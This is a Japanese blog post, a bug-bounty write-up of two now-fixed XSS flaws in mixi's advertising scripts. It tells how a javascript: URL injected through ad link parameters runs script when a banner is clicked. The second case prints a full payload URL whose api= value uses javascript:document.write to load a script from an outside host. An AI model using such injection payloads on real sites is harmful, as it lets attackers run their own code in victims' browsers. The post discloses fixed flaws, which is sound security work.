ミクシィの脆弱性報告制度でAmazonギフトをもらったのでWriteUpを書いてみる   60 comments

Posted at 12:19 pm in Security,XSS

こんにちは。今日は久しぶりに雨ですね。

cats_2013-12-06_17

雨はやだなあ

 

それはともかく10月にミクシィの脆弱性を報告したんだけど、それに対して報償のギフトをもらった&もらえなかったので、そのWriteUp的なことを書こうと思う。

どちらの脆弱性も修正されているが、URLなどについては隠しているところもあるのでご承知おきいただきたい。

その1謎の.mixi.jp/system/

こっちはもらえた方のmixi.jpドメイン。こっちは報償金がもらえるくらい影響があるみたいなので、URLについてはモザイクをかけるなど配慮しておいた。ご理解ください。
mixi.jpには別のURLから呼び出されて広告表示に使われているスクリプトがあって、実際には

mixi-02

みたいなかんじで使われている。

ad_image_urlに好きなURLを入れることが可能っぽい。

ChromeとFFの場合だと、出力結果はこんなふうになる(IEの場合は違うスクリプトに)。

<div class="bannerCreative">
<a href="http://google.com/" target="_blank">
<img src="http://google.com/" width="250" height="250" border="0">
</a>
</div>

javascript:alert(0)
入れてみたいよね。

…もちろんエラー

しょうがないので画像として読んだらjpg、クリックするとスクリプトを実行してリダイレクトする画像を作って、オープンリダイレクタ的なことにしてお茶を濁すことに。

ボールペンくらいもらえるかも( ̄ー ̄)ニヤリ

提出するのに無駄は省きたいということでいらない要素を削る

mixi-03

こんなかんじに。

報告メール書きつつhttp://以外にもfile://くらいならいけるんじゃね?

試す。

通った

???

javascript://もいけるんじゃね?

mixi-04

入れてみた

あれ??

クリックするとalert

mixi-05

何か削った要素のおかげでjavascript:が使えるようになってました。

意味わかんないけどまあいいか。

そして、

mixi-01

ミクシィさんありがとうございました。生活費の足しにします。

おしまい。

 

2.http://n2.ads.mreco0.jp/hserver/〜という長いURL

こっちは

ご報告の内容について、弊社において検討した結果、直接的な被害の発生は
軽微である、または可能性が低いと判断させていただきました。

ということらしいので配慮はしない。もちろん修正済み。

http://n2.ads.mreco0.jp/hserver/SITE=SHOWPROFILE/AREA=T.HEADER/AGE=2/AGETYPE=1/PARA=56/APPCNT=0/APPUNREG=.33371.27882.29064.38617.23246.34581.38598.31253.38917.36745.36426.37390.38140.6598./S0=0/BD=_114/BTA=0/DEV=TI/GENDER=S1/GENERIC=1380506515/H24=1/OCC=21/PREF=1/PRUNREG=0/PREM=0/MPTRG=0/CROSS=S1_56/RECENTLY_SPGAME=../XMAS2012=0/ACC_RANDOM=31136067#!parent=mixi.jp&xuid=cd86991da43a1bb6dfb364a452dd489c0a7a2233&api=http://api.ads.mixi.net/&mixi_host=http://mixi.jp&tracker_host=http://api.ads.mixi.net/&uid=ji3xr6ri7khdf&uid_sig=0ae1cfb86108900fec3aa46d20fed33ef5c83a64&puid=ji3xr6ri7khdf&puid_sig=0ae1cfb86108900fec3aa46d20fed33ef5c83a64

みたいな長いURLがあるんだけど、

#以下のapi=の値がそのままaタグに入るみたいなので

http://n2.ads.mreco0.jp/hserver/SITE=SHOWPROFILE/AREA=T.HEADER/AGE=2/AGETYPE=1/PARA=56/APPCNT=0/APPUNREG=.33371.27882.29064.38617.23246.34581.38598.31253.38917.36745.36426.37390.38140.6598./S0=0/BD=_114/BTA=0/DEV=TI/GENDER=S1/GENERIC=1380506515/H24=1/OCC=21/PREF=1/PRUNREG=0/PREM=0/MPTRG=0/CROSS=S1_56/RECENTLY_SPGAME=../XMAS2012=0/ACC_RANDOM=31136067#!parent=mixi.jp&xuid=cd86991da43a1bb6dfb364a452dd489c0a7a2233&api=javascript:document.write(‘<script src\x3dhttp://bogus.jp/x></script>’)//&mixi_host=http://mixi.jp&tracker_host=http://api.ads.mixi.net/&uid=ji3xr6ri7khdf&uid_sig=0ae1cfb86108900fec3aa46d20fed33ef5c83a64&puid=ji3xr6ri7khdf&puid_sig=0ae1cfb86108900fec3aa46d20fed33ef5c83a64

みたいにすることでバナーをクリックすると任意のスクリプトを実行させることが可能だった。

n2.ads.mreco0.jp-02

この脆弱性に関しては「報酬に関しましては、追ってご連絡いたします。」ってメールがきたけど、結局報酬はなかった。

mixi-06

メールが届いたからといって必ずしも報酬がもらえるわけじゃないんだねー。せめてボールペンでもくれたらいいのにねー

 

Written by bogus on 12月 10th, 2013